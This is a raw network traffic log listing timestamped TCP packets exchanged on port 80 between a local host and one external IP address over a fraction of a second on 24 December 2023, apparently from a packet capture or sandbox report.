Dec 24, 2023 10:44:20.323565960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323590994 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.323630095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323688030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323702097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323738098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.323761940 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.323780060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323823929 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323870897 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.323883057 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323937893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.323983908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.324014902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324084044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324163914 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324213028 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.324240923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324296951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324328899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.324357033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324398041 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.324423075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324472904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324489117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324542046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.324568033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324637890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324682951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.324696064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324738026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.324754953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324799061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324863911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.324867010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324939013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.324991941 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.325102091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325175047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325242996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.325244904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325280905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325341940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325372934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325381994 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.325414896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.325439930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325531006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.325531006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325573921 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.325592041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325640917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325697899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.325699091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325717926 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.325750113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325802088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.325812101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325843096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.325844049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325896978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.325911045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325978041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.325980902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.325982094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.326016903 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.326020956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.326092005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.326153040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.326186895 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.326244116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.326306105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.326347113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.326370955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.326430082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.326440096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.326453924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.326495886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.326518059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.326644897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.326689005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.326704025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.368928909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.585030079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.585061073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.585118055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.585319042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.585416079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.585465908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.585994959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.586074114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.586283922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.586333990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.586334944 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.586426020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.586467028 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.586473942 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.586523056 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.586525917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.586595058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.586643934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.586847067 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.586896896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.586952925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.587172031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.587246895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.587323904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.587367058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.587368011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.587423086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.587465048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.587505102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.587552071 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.587729931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.587785006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.587830067 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.588059902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.588155985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.588201046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.588275909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.588357925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.588469982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.588517904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.588534117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.588582039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.588604927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.588674068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.588723898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.588762045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.588880062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.588929892 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.589068890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.589175940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.589237928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.589282990 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.589286089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.589350939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.589400053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.589421988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.589473963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.589477062 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.589521885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.589571953 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.589598894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.589673996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.589720011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.589914083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.589967012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590008974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590058088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.590068102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590122938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590178967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.590204000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590284109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.590307951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590384007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590435028 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.590450048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590523958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590574980 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.590624094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590652943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590689898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.590708971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590763092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590904951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.590955019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.590986967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.591104984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.591150999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.591176033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.591223001 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.591275930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.591379881 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.591427088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.591439009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.591494083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.591536999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.591571093 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.591639996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.591732025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.591774940 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.591902018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.592192888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.592252016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.592252016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.592288971 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.592319965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.592361927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.592411995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.592482090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.592586994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.592683077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.592732906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.592782974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.592884064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.592927933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.593031883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593067884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593076944 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.593143940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593225002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593266010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.593307018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593421936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593473911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593480110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.593533039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593548059 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.593594074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593632936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593678951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.593703032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593862057 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593902111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.593908072 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.593939066 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.593986034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594014883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594062090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.594130993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594182968 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594254971 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.594269037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594324112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594389915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594434977 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.594496965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594573021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594608068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594620943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.594623089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594647884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.594713926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594898939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.594943047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.594949961 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595058918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595103025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595105886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.595144987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.595283985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595371008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595412016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.595581055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595643997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595690012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595690966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.595746994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595813990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595860004 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.595868111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595933914 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595974922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.595978022 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.596009970 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.596023083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596071005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596117020 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.596126080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596174955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596223116 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.596266031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596299887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596338034 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.596414089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596474886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596579075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.596617937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596682072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596729040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596774101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.596775055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596807957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596857071 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.596879959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596920967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.596921921 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.596980095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597023964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597028017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.597074986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597121954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.597132921 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597171068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597203016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597224951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.597266912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597316980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597361088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.597379923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597417116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597464085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.597543001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597584963 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.597603083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597671986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597723007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.597738981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597773075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597821951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.597843885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.597948074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598032951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598062038 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598077059 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.598100901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.598104954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598176003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598222017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.598241091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598289967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598332882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.598387003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598443985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598503113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598548889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.598553896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598725080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598767042 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.598788977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598850965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598870039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.598895073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.598961115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.599004984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.599009991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.599045992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.599086046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.599092007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.599128962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.599163055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.599222898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.599268913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.599271059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.599340916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.599385023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:20.599410057 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:20.599431038 CET	80	49716	91.215.85.17	192.168.2.5
